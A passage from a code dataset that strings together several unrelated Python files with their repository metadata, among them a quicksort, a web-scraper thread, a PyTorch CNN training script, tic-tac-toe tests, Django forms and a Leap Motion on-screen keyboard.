"gabriel@kenzie.com.br"
] |
gabriel@kenzie.com.br
|
57f2d53fece733ed42ba3a2d06d8663a6e9019ed
|
e3013ce104d6c3188d51e7da5c14f455d0de8825
|
/algorithms/sort/02_QuickSort.py
|
b2f6c2fe6b746126686177583a7848381bdaf421
|
[] |
no_license
|
whztt07/LearningNotes
|
73c9ea22a3d4efee0b2f1b508a2b5a5589aa5c22
|
250a5e1d094e57e7fd36fa244d0fdd985083ea28
|
refs/heads/master
| 2020-05-31T14:51:25.672031
| 2018-09-18T08:10:50
| 2018-09-18T08:10:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 318
|
py
|
def quicksort(seq):
    """Return a sorted copy of `seq` (ascending) via recursive quicksort.

    The first element is the pivot; items >= pivot go right, so duplicate
    pivot values are preserved.
    """
    if len(seq) <= 1:
        return seq
    pivot = seq[0]
    # Slice + comprehension replaces the original index-based
    # xrange(1, len(seq)) loops — xrange is Python-2-only, and indexing
    # into seq is unnecessary; this works on both Python 2 and 3.
    smaller = [item for item in seq[1:] if item < pivot]
    larger_or_equal = [item for item in seq[1:] if item >= pivot]
    return quicksort(smaller) + [pivot] + quicksort(larger_or_equal)
# Demo: sort a sample list. Calling print with a single parenthesized
# argument works on both Python 2 and 3 (the original bare `print`
# statement is Python-2-only).
seq = [2, 7, 1, 0, 8, 4, 6]
print(quicksort(seq))
|
[
"yucicheung@gmail.com"
] |
yucicheung@gmail.com
|
0026db84ebcfa42870b8b26a69006d371809c47b
|
83c630867d539e33d770e2a0b31e9c5094965ee4
|
/py/AllBoxxProduct.py
|
7089e545dad7c6b557b580b3cae95344e30a8a2d
|
[] |
no_license
|
max-toth/allboxx-crawler
|
7a805f01ef45dfa572ac4cd760d0371a815c2a5e
|
effc1b069d204e64ad9a46b8260bbf1718041da2
|
refs/heads/master
| 2021-05-27T13:38:29.584139
| 2014-08-12T10:40:36
| 2014-08-12T10:40:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,234
|
py
|
import threading
import time
import AllBoxxParser
import AllBoxxSingleton
import OnlyOne
# Module-wide values: exitFlag appears unused in this chunk; rows is
# presumably the expected number of CSV input lines — TODO confirm.
exitFlag = 0
rows = 17865
class bcolors:
    """ANSI terminal escape codes for colored console output."""
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'  # reset to default color
class myThread (threading.Thread):
    """Worker thread: scrape product data for each ';'-separated CSV line
    in `urls` and write the augmented lines to '<thread-name>.csv'."""
    def __init__(self, threadID, name, urls, lines):
        threading.Thread.__init__(self)
        self.threadID = threadID
        self.name = name
        self.urls = urls    # CSV lines; field index 3 is the item id
        self.lines = lines
    def run(self):
        # NOTE(review): prds and failed are created but never used here —
        # presumably shared singletons kept alive for side effects; confirm.
        prds = AllBoxxSingleton.AllBoxxSingleton()
        failed = OnlyOne.OnlyOne()
        items = []
        for url in self.urls:
            current_item = url.split(';')[3]
            try:
                updated_line = url.replace('\n', '') + ";" + AllBoxxParser.products(current_item)
                print(current_item)
                items.append(updated_line)
            except Exception as e:
                print(bcolors.FAIL + current_item + ' in Thread ' + self.name + bcolors.ENDC + ' ' + str(e))
                # Retry by re-queuing the failed line. NOTE(review): this
                # appends to the list being iterated, extending the loop —
                # a permanently failing item would retry forever.
                self.urls.append(url)
                time.sleep(5)
        f = open(self.name + '.csv', 'w')
        for x in items:
            # NOTE(review): no newline is appended here — presumably
            # AllBoxxParser.products() returns a trailing newline; confirm.
            f.write(x)
        f.close()
|
[
"maxim.v.tolstyh@gmail.com"
] |
maxim.v.tolstyh@gmail.com
|
40d3c003cfd438165197d7f4ef2e0e96c543d6e1
|
a62eea622d7fa0486e30155020fa77addc8cec64
|
/e-nose-cnn/cnndw.py
|
e310e0b1f8adc7581ca7ca569897dfdb6305d5b6
|
[] |
no_license
|
19120332843/learning_python
|
42004a1921101dc6bb4c1fee2f0455c9f0ceea7e
|
5f26942ccafb49cc08d348e2360711e842bfa8e6
|
refs/heads/master
| 2022-11-07T06:38:36.296724
| 2020-06-29T14:06:23
| 2020-06-29T14:06:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,545
|
py
|
# -*- coding:utf-8 -*-
import pandas as pd
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.nn.init as init
from torch.autograd import Variable
import os
import sklearn
from sklearn.model_selection import train_test_split
def Normlize(Z):
    """Row-wise min-max centering: (Z - row_mean) / (row_max - row_min).

    Z is a 2-D array; statistics are taken along axis 1 and reshaped to
    column vectors so they broadcast across each row.
    """
    row_max = Z.max(axis=1).reshape(-1, 1)
    row_min = Z.min(axis=1).reshape(-1, 1)
    row_mean = Z.mean(axis=1).reshape(-1, 1)
    return (Z - row_mean) / (row_max - row_min)
def Data_Reading(Normalization=True):
    """Load the e-nose dataset and return a 75/25 train/test split.

    Features come back as CUDA float tensors, labels as int64 CPU tensors.
    NOTE(review): `data` is always normalized regardless of the flag; the
    flag only gates the tensor conversion below, and a False value would
    leave `data` as a numpy array for the `.view` call (different
    signature) — confirm the intended semantics.
    """
    data = np.load('codedata//3times//dataset.npy')
    label = np.load('codedata//3times//label.npy')
    # Normalization
    data = Normlize(data)
    if Normalization:
        data = torch.from_numpy(data).type(torch.cuda.FloatTensor)
        label = torch.from_numpy(label).type(torch.int64)
    # reshape to (700, 10, 1, 120) — presumably (samples, channels, 1, time); confirm
    data = data.view(700, 10, 1, 120)
    # Round-trip through numpy so sklearn's splitter can shuffle the data.
    data = data.cpu().numpy()
    label = label.numpy()
    train_x, test_x, train_y, test_y = train_test_split(data, label, test_size=0.25)
    train_x = torch.from_numpy(train_x).type(torch.cuda.FloatTensor)
    test_x = torch.from_numpy(test_x).type(torch.cuda.FloatTensor)
    train_y = torch.from_numpy(train_y).type(torch.int64)
    test_y = torch.from_numpy(test_y).type(torch.int64)
    return train_x, test_x, train_y, test_y
class hswish(nn.Module):
    """Activation used by this network: x * relu(x + 3) / 4.

    NOTE(review): the canonical h-swish is x * relu6(x + 3) / 6; this
    variant (plain relu, divisor 4) is preserved exactly because the
    trained weights depend on it.
    """

    def forward(self, x):
        shifted = F.relu(x + 3)
        return x * shifted / 4
class Net(nn.Module):
    """Depthwise-separable CNN for 7-class e-nose classification.

    Expects input of shape (batch, 10, 1, 120): 10 sensor channels of
    120 samples each.  Each stage is a depthwise conv (groups equal to
    in_channels) followed by a pointwise 1x1 conv, MobileNet-style.
    Layer creation and init order below is kept fixed so RNG consumption
    (and hence reproducibility with a seed) is unchanged.
    """
    def __init__(self):
        super(Net, self).__init__()
        # Depthwise conv over time: (120 - 3)/1 + 1 = 118 samples out.
        self.conv1d = nn.Conv2d(in_channels = 10, out_channels = 10, kernel_size = (1, 3), stride = 1, groups = 10)#(120 - 3)/1 + 1 = 118
        # Pointwise 1x1 mixes 10 channels down to 6.
        self.conv1p = nn.Conv2d(in_channels = 10, out_channels = 6, kernel_size = 1, stride = 1, groups = 1)
        self.hswish1 = hswish()
        # Second depthwise stage: (59 - 2)/1 + 1 = 58 samples out.
        self.conv2d = nn.Conv2d(in_channels = 6, out_channels = 6, kernel_size = (1, 2), stride = 1, groups = 6)#(59 - 2)/1 + 1 = 58
        self.conv2p = nn.Conv2d(in_channels = 6, out_channels = 10, kernel_size = 1, stride = 1, groups = 1)
        self.hswish2 = hswish()
        self.fc1 = nn.Linear(10*29, 7)# 10*29 = flattened feature count per sample; 7 output classes
        # Manual weight init: Xavier for convs, small normal for the FC.
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                init.xavier_uniform_(m.weight)
                init.constant_(m.bias, 0)
            elif isinstance(m, nn.Linear):
                init.normal_(m.weight, std=0.001)
    def forward(self, x):
        """Run the two separable-conv stages and the classifier head.

        Shape comments below track (channels, 1, time) per sample.
        Returns raw logits (CrossEntropyLoss applies log-softmax).
        """
        #10*1*120
        x = self.conv1d(x)
        x = F.relu(x)
        #10*1*118
        x = self.conv1p(x)
        x = self.hswish1(x)
        #6*1*118
        x = F.max_pool2d(x, (1, 2))
        #6*1*59
        x = self.conv2d(x)
        x = F.relu(x)
        #6*1*58
        x = self.conv2p(x)
        x = self.hswish2(x)
        #10*1*58
        x = F.max_pool2d(x, (1, 2))
        #10*1*29
        x = x.view(x.size(0), -1)
        #290
        x = self.fc1(x)
        return x  # logits
if __name__ == '__main__':
    # Training entry point: 300 epochs of SGD with a two-milestone LR drop,
    # evaluating on the held-out split every epoch and checkpointing the
    # best test accuracy.  NOTE: `sum` and `max` below shadow the builtins.
    device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")#cuda:0
    print(device)
    cnn = Net()
    # print(cnn)
    cnn.to(device)
    #sgd -> stochastic gradient descent
    lrr = 0.01
    mom = 0.9
    optimizer = optim.SGD(cnn.parameters(), lr=lrr, momentum=mom)#
    scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones = [200,260], gamma=0.1)
    loss_func = nn.CrossEntropyLoss()#CrossEntropyLoss()
    train_x, test_x, train_y, test_y = Data_Reading(Normalization=1)
    train_y = train_y.squeeze()
    test_y = test_y.squeeze()
    train_x = train_x.to(device)
    test_x = test_x.to(device)
    train_y = train_y.to(device)
    test_y = test_y.to(device)
    #train
    sum = 0
    max = 0
    batch_size = 21
    tr_x = Variable(train_x)
    tr_y = Variable(train_y)
    for epoch in range(300):
        running_loss = 0.0
        # Mini-batch loop; any remainder that doesn't fill a batch is dropped.
        for i in range(0,(int)(len(train_x)/batch_size)):
            t_x = Variable(train_x[i*batch_size:i*batch_size+batch_size])
            t_y = Variable(train_y[i*batch_size:i*batch_size+batch_size])
            out = cnn(t_x)
            loss = loss_func(out, t_y)
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
            running_loss += loss.item()
        # 25 = number of batches per epoch (525 train samples / 21).
        running_loss = running_loss / 25
        # Full-train-set accuracy for monitoring.
        out = cnn(tr_x)
        predicted_train = torch.max(out.data, 1)[1]
        total_train = tr_y.size(0)# total number of training samples
        for j in range(tr_y.size(0)):
            if predicted_train[j] == tr_y[j]:
                sum += 1
        print('total_train:{}, accuracy:{}, sum:{}'.format(total_train, sum / total_train, sum))
        sum = 0
        scheduler.step()
        print('Epoch[{}], loss: {:.8f}'.format(epoch + 1, running_loss))
        # print(optimizer)
        #test
        te_x = Variable(test_x)
        te_y = Variable(test_y)
        out1 = cnn(te_x)
        predicted_test = torch.max(out1.data, 1)[1]#.data.squeeze()
        total = te_y.size(0)
        for j in range(te_y.size(0)):
            if predicted_test[j] == te_y[j]:
                sum += 1
        # Checkpoint whenever test accuracy improves.
        if(max < sum/total):
            max = sum/total
            maxepoch = epoch + 1
            torch.save(cnn, './net/mobilenet627.pkl')
        # NOTE(review): if the first epoch's accuracy is exactly 0, maxepoch
        # is never bound and this print raises NameError — confirm acceptable.
        print('total:{}, accuracy:{}, sum:{}, max={}, maxepoch={}'.format(total, sum / total, sum, max, maxepoch))
        print('=============================================================================')
        sum = 0
|
[
"1345238761@qq.com"
] |
1345238761@qq.com
|
45fd8141325bc59f611d12b4c37c99c4121032cd
|
bc5fb02217c23cf169537dd8c64b096d2c0a972f
|
/test/practise_python/test_TicTakToe.py
|
09620e432f81ec84087fd5cd597bd1ea42d8b977
|
[] |
no_license
|
BasilBibi/PY-scratch
|
c554b60f900b8e28968c06183739e51af1a92c18
|
cb176a284eef8b0db5ac291130fd9fb91d4537d1
|
refs/heads/develop
| 2021-04-15T07:15:29.894804
| 2020-04-08T12:01:12
| 2020-04-08T12:01:12
| 126,475,452
| 1
| 1
| null | 2019-10-23T12:47:44
| 2018-03-23T11:21:30
|
Python
|
UTF-8
|
Python
| false
| false
| 4,393
|
py
|
import unittest
from py_scratch.practise_python.GameBoard import TicTakToe, RowPopulation, ColPopulation, DiagPopulation
def make_board(size, init_char):
    """Return a size x size board with every cell set to init_char.

    Each row is an independent list, so mutating one cell does not
    affect other rows.
    """
    return [[init_char] * size for _ in range(size)]
class TicTakToeTests(unittest.TestCase):
    """Unit tests for TicTakToe's row/column/diagonal population analysis.

    Boards are 3x3 lists of single-character strings; ' ' is the empty
    cell.  Row/Col/DiagPopulation pair an index (or diagonal name) with
    the set of characters found along that line.
    """
    def test_cons(self):
        # A fresh game starts with an all-blank 3x3 board.
        ttt3 = TicTakToe()
        self.assertEqual([[' ', ' ', ' '],
                          [' ', ' ', ' '],
                          [' ', ' ', ' ']], ttt3.board)
    def test_get_row_sets(self):
        board = make_board(3, ' ')
        expected = [RowPopulation(0, set(' ')),
                    RowPopulation(1, set(' ')),
                    RowPopulation(2, set(' '))]
        self.assertEqual( expected, TicTakToe().get_row_sets(board) )
    def test_get_row_sets_diffs(self):
        board = [[' ', 'X', 'O'],
                 [' ', 'X', 'O'],
                 [' ', 'X', 'O']]
        expected = [RowPopulation(0, set({' ', 'X', 'O'})),
                    RowPopulation(1, set({' ', 'X', 'O'})),
                    RowPopulation(2, set({' ', 'X', 'O'}))]
        self.assertEqual( expected, TicTakToe().get_row_sets(board))
    def test_get_col_sets(self):
        # Columns here are uniform, so each column set has one element.
        board = [[' ', 'X', 'O'],
                 [' ', 'X', 'O'],
                 [' ', 'X', 'O']]
        expected = [ColPopulation(0, set({' '})),
                    ColPopulation(1, set({'X'})),
                    ColPopulation(2, set({'O'}))]
        self.assertEqual( expected, TicTakToe().get_col_sets(board))
    def test_get_diag_sets(self):
        board = [[' ', ' ', ' '],
                 [' ', ' ', ' '],
                 [' ', ' ', ' ']]
        expected = [DiagPopulation('FwdSlash', set({' '})),
                    DiagPopulation('BkSlash', set({' '}))]
        self.assertEqual( expected, TicTakToe().get_diag_sets(board))
    def test_get_diag_sets_diff(self):
        board = [[' ', 'X', 'O'],
                 [' ', 'X', 'O'],
                 [' ', 'X', 'O']]
        expected = [DiagPopulation('FwdSlash', set({' ', 'X', 'O'})),
                    DiagPopulation('BkSlash', set({' ', 'X', 'O'}))]
        self.assertEqual( expected, TicTakToe().get_diag_sets(board))
    def test_is_validPopulation_len_not_ok(self):
        # A winning line must contain exactly one distinct character.
        ttt=TicTakToe()
        pop = set({'a', 'b'})
        self.assertFalse( ttt.is_valid_population(pop) )
    def test_is_validPopulation_len_ok(self):
        ttt=TicTakToe()
        pop = set('a')
        self.assertTrue( ttt.is_valid_population(pop) )
    def test_is_validPopulation_len_ok_character_ok(self):
        # NOTE(review): duplicates test_is_validPopulation_len_ok exactly.
        ttt=TicTakToe()
        pop = set('a')
        self.assertTrue( ttt.is_valid_population(pop) )
    def test_is_validPopulation_len_ok_character_not_ok(self):
        # A line of only the init (blank) character is not a win.
        ttt = TicTakToe()
        pop = set(ttt.init_char)
        self.assertFalse( ttt.is_valid_population(pop) )
    def test_winning_row_set(self):
        board = [[' ', ' ', ' '],
                 [' ', ' ', ' '],
                 [' ', ' ', ' ']]
        expected = []
        self.assertEqual(expected, TicTakToe().winning_row_set(board))
    def test_winning_row_set_empty(self):
        board = [['X', 'X', 'X'],
                 [' ', 'X', 'O'],
                 [' ', 'X', 'O']]
        expected = [RowPopulation(0, set({'X'}))]
        self.assertEqual(expected, TicTakToe().winning_row_set(board))
    def test_winning_row_set_no_result(self):
        board = [[' ', 'X', 'O'],
                 [' ', 'X', 'O'],
                 [' ', 'X', 'O']]
        expected = []
        self.assertEqual( expected, TicTakToe().winning_row_set(board) )
    def test_winning_col_set(self):
        board = [[' ', ' ', ' '],
                 [' ', ' ', ' '],
                 [' ', ' ', ' ']]
        expected = []
        self.assertEqual(expected, TicTakToe().winning_col_set(board))
    def test_winning_col_set_empty(self):
        # Column 1 is all 'X' on this board.
        board = [['X', 'X', 'X'],
                 [' ', 'X', 'O'],
                 [' ', 'X', 'O']]
        expected = [ColPopulation(1, set('X'))]
        self.assertEqual(expected, TicTakToe().winning_col_set(board))
    def test_winning_col_set_no_result(self):
        board = [[' ', 'X', 'O'],
                 ['X', ' ', 'X'],
                 ['O', 'O', ' ']]
        expected = []
        self.assertEqual( expected, TicTakToe().winning_col_set(board) )
|
[
"basilbibi@hotmail.com"
] |
basilbibi@hotmail.com
|
0304c5bfcd97ee77e26583fa65be39ff4d649d93
|
742c8ac2b1e5283b8a9a073b2bf01407c7a07e6d
|
/Lesson_8.py
|
8ed30c165856d8885c5cfa040510ba80fa5a58de
|
[] |
no_license
|
MORVf/Lessons_python_part2
|
993c24a2664e5e552f61a7dcc766700d16557abb
|
721292862254019dad95a28e2a0a2765d711d4fb
|
refs/heads/main
| 2023-03-07T15:50:05.288100
| 2021-02-24T17:23:05
| 2021-02-24T17:23:05
| 318,802,528
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,123
|
py
|
'''
Реализуйте структуру данных, представляющую собой расширенную структуру стек. Необходимо поддерживать добавление элемента
на вершину стека, удаление с вершины стека, и необходимо поддерживать операции сложения, вычитания, умножения и целочисленного деления.
Операция сложения на стеке определяется следующим образом. Со стека снимается верхний элемент (top1), затем снимается следующий верхний
элемент (top2), и затем как результат операции сложения на вершину стека кладется элемент, равный top1 + top2.
Аналогичным образом определяются операции вычитания (top1 - top2), умножения (top1 * top2) и целочисленного деления (top1 // top2).
Реализуйте эту структуру данных как класс ExtendedStack, отнаследовав его от стандартного класса list.
Для добавления элемента на стек используется метод append, а для снятия со стека – метод pop.
Гарантируется, что операции будут совершаться только когда в стеке есть хотя бы два элемента.
'''
class ExtendedStack(list):
    """A list-based stack with arithmetic ops over its top two elements.

    Each operation pops top1, then top2, and pushes top1 <op> top2.
    Elements are added with append() and removed with pop(); callers
    guarantee at least two elements before any arithmetic op.
    """

    def _combine(self, op):
        # Pop order matters: the first pop is the LEFT operand.
        top1 = self.pop()
        top2 = self.pop()
        self.append(op(top1, top2))

    def my_sum(self):
        """Push top1 + top2."""
        self._combine(lambda a, b: a + b)

    def sub(self):
        """Push top1 - top2."""
        self._combine(lambda a, b: a - b)

    def mul(self):
        """Push top1 * top2."""
        self._combine(lambda a, b: a * b)

    def div(self):
        """Push top1 // top2 (floor division)."""
        self._combine(lambda a, b: a // b)
'''
тесты
X = ExtendedStack([1, 2, 3, 4, -3, 3, 5, 10])
print(X)
X.my_sum()
print(X)
X.sub()
print(X)
X.mul()
print(X)
X.div()
print(X)
X.append(20)
print(X)
X.pop()
print(X)
'''
|
[
"noreply@github.com"
] |
MORVf.noreply@github.com
|
732f3c012d3c55f5169589f6bf9402b43988c1e0
|
735571ceed8be69d4b182561ba597fa5ff66c10e
|
/Par. 1/codes/eSquared.py
|
dd2321784c602aea5da9f04db935ac8fc67f127e
|
[] |
no_license
|
Kaladin12/numerical_methods_winterTerm_2020
|
1dd7a355a2cb0ce01c7c783cf29664863d355670
|
7685aa5f0db7218bb95b91b94a7e100bbb3e7d40
|
refs/heads/master
| 2023-02-17T22:26:10.896907
| 2021-01-20T04:35:34
| 2021-01-20T04:35:34
| 304,725,568
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 221
|
py
|
import math

# Approximate e**2 via the Maclaurin series of e**(2x) evaluated at x = 1:
# sum over k of (2x)**k / k!.  Summation order (k = 0..n-1, left to right)
# matches the original loop so the float result is bit-identical.
x = 1
n = 1000
S = sum((2*x)**(k)/(math.factorial(k)) for k in range(n))
print('Valor real: ', (math.e)**2)
print('Itearciones :', n)
print('Aprocimación: ', S, 'con un error de ', (math.e)**2 - S)
|
[
"eliancruz998@gmail.com"
] |
eliancruz998@gmail.com
|
eac348a53210fd8d9c0982f727958bca046b69ca
|
b1b7e9427874de5d7b1f949a85d7fa047b160433
|
/jobApp/form.py
|
46005a5ab61d519b1e44e86436a063b8d9049c2b
|
[] |
no_license
|
sirox548/ICIMS_JOBAPP
|
0d6d1d425585aa3799bcbb9c8eede5a61b66fa8e
|
b1a7d2915c6d5f76f1e722b68498959b5f005a72
|
refs/heads/main
| 2023-02-22T13:44:32.552325
| 2021-01-24T16:11:58
| 2021-01-24T16:11:58
| 326,033,122
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 754
|
py
|
from django.forms import ModelForm
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django import forms
from .models import Employer, Candidate
class CreateUserForm(UserCreationForm):
    """Registration form for Django's built-in User, with name and email."""
    class Meta:
        model = User
        # password1/password2 are the UserCreationForm confirmation pair.
        fields = ['first_name', 'last_name', 'username', 'email', 'password1', 'password2']
class EmployerForm(forms.ModelForm):
    """ModelForm over Employer exposing every field except `candidate`."""
    class Meta:
        model = Employer
        fields = '__all__'
        exclude = ['candidate']
class ResumeUpload(forms.Form):
    """Plain form for uploading a resume file with a short title."""
    title = forms.CharField(max_length=50)
    resume = forms.FileField()
class CandidateForm(forms.ModelForm):
    """ModelForm over Candidate exposing every field except `user`."""
    class Meta:
        model = Candidate
        fields = '__all__'
        exclude = ['user']
|
[
"55093250+sirox548@users.noreply.github.com"
] |
55093250+sirox548@users.noreply.github.com
|
4165bc48b340d4d2f4bc37bbefc8be9e8c6c2c7e
|
4c1084cbad23aab949ad733dc0f686ec0e62a37d
|
/MotionStuff/keyboard.py
|
75aa956d084d90a5868a08ec9ee5cdf4a9af23a9
|
[] |
no_license
|
avarchy/Leap-Motion-Experiments
|
1c31675f0640429a268d50a580bb47e11a72fc35
|
869b7e68d4b3e77dc26508ed4226745bc3bbb86c
|
refs/heads/master
| 2016-09-05T11:21:30.368073
| 2015-01-10T00:03:21
| 2015-01-10T00:03:21
| 26,896,309
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,153
|
py
|
# Adithya Venkatesan
#
# keyboard
# need to work on getting key presses to work
#
from Tkinter import *
from sys import exit
import math
import Leap, sys
from Leap import CircleGesture, KeyTapGesture, ScreenTapGesture, SwipeGesture
# Canvas dimensions in pixels.
w,h= 975,400
# NOTE(review): x, y, dx, dy appear unused in the visible code — confirm.
x,y,dx,dy=100,100,199,199
# Canvas item ids for the fingertip markers drawn each Leap frame.
fingdisplist = []
# Multiplier mapping Leap millimeter coordinates to canvas pixels.
scaling = 3.0
def quit(evnt):
    """Tk key-binding handler (<q>): terminate the application."""
    # `exit` is sys.exit (imported at module top); raises SystemExit.
    exit(0)
class SampleListener(Leap.Listener):
    """Leap Motion listener driving the on-screen keyboard (Python 2).

    on_frame redraws fingertip markers on the global Tk `canvas` and maps
    KEY_TAP gestures to key presses on the drawn keyboard, writing into
    the global `typed` Entry widget.
    """
    def on_init(self, controller):
        print "Initialized"
    def on_connect(self, controller):
        print "Connected"
        # Enable gestures
        controller.enable_gesture(Leap.Gesture.TYPE_CIRCLE);
        controller.enable_gesture(Leap.Gesture.TYPE_KEY_TAP);
        controller.enable_gesture(Leap.Gesture.TYPE_SCREEN_TAP);
        controller.enable_gesture(Leap.Gesture.TYPE_SWIPE);
    def on_disconnect(self, controller):
        # Note: not dispatched when running in a debugger.
        print "Disconnected"
    def on_exit(self, controller):
        print "Exited"
    def on_frame(self, controller):
        # Get the most recent frame and report some basic information
        # Clear last frame's fingertip markers before redrawing.
        global fingdisplist
        for finger in fingdisplist:
            canvas.delete(finger)
        fingdisplist = []
        frame = controller.frame()
        ##print "Frame id: %d, timestamp: %d, hands: %d, fingers: %d, tools: %d, gestures: %d" % (
        ##      frame.id, frame.timestamp, len(frame.hands), len(frame.fingers), len(frame.tools), len(frame.gestures()))
        if not frame.hands.is_empty:
            # Get the first hand
            for hand in frame.hands:
                # Check if the hand has any fingers
                fingers = hand.fingers
                if not fingers.is_empty:
                    # Calculate the hand's average finger tip position
                    avg_pos = Leap.Vector()
                    # Draw one oval per fingertip; Leap x maps to canvas x,
                    # Leap z maps to canvas y, both scaled and centered.
                    for finger in fingers:
                        fingdisplist.append(canvas.create_oval( w/2+scaling*(finger.tip_position[0]), h/2+scaling*(finger.tip_position[2]) , w/2+scaling*(finger.tip_position[0])+circlediameter , h/2+scaling*(finger.tip_position[2])+circlediameter,fill='blue',outline=''))
                        #fingdisplist.append(a)
                        ##avg_pos += finger.tip_position
                    ##avg_pos /= len(fingers)
                    #canvas.delete(a)
                #print "Hand has %d fingers, finger drawn: %s" % (len(fingers), finger.tip_position)
        #use find_overlapping(x1,y1,x2,y2) to find rectangle that it is inside
        #use a bounding box that is tall enough that it goes a little past the height of a key
        #then check each of the tuples for left <= x <= right, top <= y <= bottom
        #if any satisfy, it is hitting that key => set the key a different shade for a sec and register the letters
        for gesture in frame.gestures():
            if gesture.type == Leap.Gesture.TYPE_KEY_TAP:
                keytap = KeyTapGesture(gesture)
                #print "Key Tap Position: %s, direction %s" % (keytap.position, keytap.direction)
                # Project the tap into canvas coordinates, then find which
                # drawn key rectangle (if any) contains the tap point.
                xtap=int(w/2+scaling*(keytap.position[0]))
                ytap=int(h/2+scaling*(keytap.position[2]))
                overlapkeys = canvas.find_overlapping(xtap-1,ytap-(key_height/2+1),xtap+1,ytap+(key_height/2+1))
                #print len(overlapkeys)
                for posskey in overlapkeys:
                    tempcoords = canvas.coords(posskey)
                    if len(tempcoords)<4:
                        print tempcoords
                    if tempcoords[0] < xtap and xtap < tempcoords[2] and tempcoords[1] < ytap and ytap < tempcoords[3]:
                        if canvas.type(posskey)=="rectangle":
                            # The rectangle's first tag is the key label.
                            pressedkey = canvas.gettags(posskey)[0]
                            print pressedkey
                            #various key functions
                            if pressedkey=='Backspace':
                                typed.delete(len(typed.get())-1,END)
                            elif pressedkey=='space':
                                typed.insert(END,' ')
                            elif pressedkey=='Enter':
                                typed.insert(END,'\n')
                            elif pressedkey=='Shift':
                                # NOTE(review): shiftnextkey is assigned but
                                # never declared global or read — confirm
                                # shift handling was ever finished.
                                shiftnextkey=True
                            else:
                                typed.insert(END,canvas.gettags(posskey)[0])
            elif gesture.type == Leap.Gesture.TYPE_CIRCLE:
                circle = CircleGesture(gesture)
                #determines which direction you are circling
                if circle.pointable.direction.angle_to(circle.normal) <= Leap.PI/4:
                    clockwiseness = "clockwise"
                else:
                    clockwiseness = "counterclockwise"
                #circle
                # Angle swept since the previous frame's view of this gesture.
                previous_update = CircleGesture(controller.frame(1).gesture(circle.id))
                swept_angle = (circle.progress - previous_update.progress) * 2 * Leap.PI
                if swept_angle > 3:
                    print 'circles!'
#
#Start of stuff
#
# Build the Tk window and canvas, draw the keyboard, then hand control to
# the Leap listener (events) and the Tk main loop.
root=Tk()
canvas=Canvas(root,width=w,height=h,bg='white')
canvas.pack()
#
# Graphics objects.
#
# Key geometry in pixels.
key_width = 70
key_height = 60
circlediameter = 20
keyspacing = 4
# Keyboard layout; entries like '*20' are horizontal offsets (pixels) used
# to stagger rows, consumed by the drawing loop below.
btn_list = [
['`','1','2','3','4','5','6','7','8','9','0','-','='],
['*20','q','w','e','r','t','y','u','i','o','p','Backspace'],
['*40','a','s','d','f','g','h','j','k','l',';','\'','Enter'],
['Shift','z','x','c','v','b','n','m',',','.','/','Shift'],
['*200','space']]
# Text box that receives the typed characters.
typed = Entry(root, bd =5, width=30)
typed.pack()
typed.place(relx=.45,rely=.9)
#option to copy text in the program
#just add button to get this to work, probably need a click event
#root.withdraw()
#root.clipboard_clear()
#root.clipboard_append(typed.get())
#root.destroy()
# Draw each key as a tagged rectangle plus a text label; the tag is how
# on_frame resolves a tap back to a key name.
ycorner=10
for r in btn_list:
    xcorner=10
    for c in r:
        if c[0]=='*' and not len(c)==1:
            xcorner+= int(''.join(map(str,c[1:])))#one liner to convert list to num
        #specifies spacing used
        #elif c[0]=='+' and not len[c]==1:
        elif c == 'space':
            # Space bar spans seven key widths.
            rect=canvas.create_rectangle(xcorner,ycorner,xcorner+7*key_width,ycorner+key_height,fill='gray',outline='black',tags="space")
            objt=canvas.create_text((7*key_width+2*xcorner)/2,(key_height+2*ycorner)/2,text=c,fill='white')
            xcorner+=keyspacing+key_width
        else:
            rect=canvas.create_rectangle(xcorner,ycorner,xcorner+key_width,ycorner+key_height,fill='gray',outline='black',tags=c)
            objt=canvas.create_text((key_width+2*xcorner)/2,(key_height+2*ycorner)/2,text=c,fill='white')
            xcorner+=keyspacing+key_width
    ycorner+=keyspacing+key_height
listener = SampleListener()
controller = Leap.Controller()
# Have the sample listener receive events from the controller
controller.add_listener(listener)
# Gestures
#
# Callbacks.
#
##root.bind('<Down>',down)
##root.bind('<Up>',up)
##root.bind('<Right>',right)
##root.bind('<Left>',left)
# Press 'q' in the window to exit.
root.bind('<q>',quit)
#
# Here we go.
#
root.mainloop()
|
[
"avarchy@gmail.com"
] |
avarchy@gmail.com
|
0f5ac101c37ad80b6a39382e13fbe8f1b43422d3
|
2332aa3eddd8b0acada5197b98afa5068a653dfd
|
/test/utils/test_crud.py
|
5bea2484670a32d7a996610eddeab43f8bb3c021
|
[] |
no_license
|
Rottab/currency-converter-cli
|
a60b92d7cd9a355db0630c8cf56d1414c9e0638b
|
2391f58da9e134c583faef49c94ac492bfef4095
|
refs/heads/main
| 2022-12-24T06:36:45.603672
| 2020-10-04T10:00:20
| 2020-10-04T10:00:20
| 300,434,280
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 99
|
py
|
from currency_converter_cli.utils.crud import *
import pytest
def test_rates_from_json():
    """Placeholder — TODO: exercise rates_from_json once fixtures exist."""
|
[
"mr.rottab@gmail.com"
] |
mr.rottab@gmail.com
|
1cd730dbcf05a7be95382c869bcd5b92c37a75b1
|
ab6a40ac8e136a9ee2cbf214bc29f864507f42ad
|
/BIOAuthMedicare/util.py
|
595d5f2c6b8d1c12d672227521acf1d7147e0e37
|
[] |
no_license
|
SnehitReddy/BIOAuthMedicare
|
d6ecf069ce843d657d8c1705c00d0e86decd73fd
|
4b96caa1403aad291dfb48fb62129aaee358017e
|
refs/heads/master
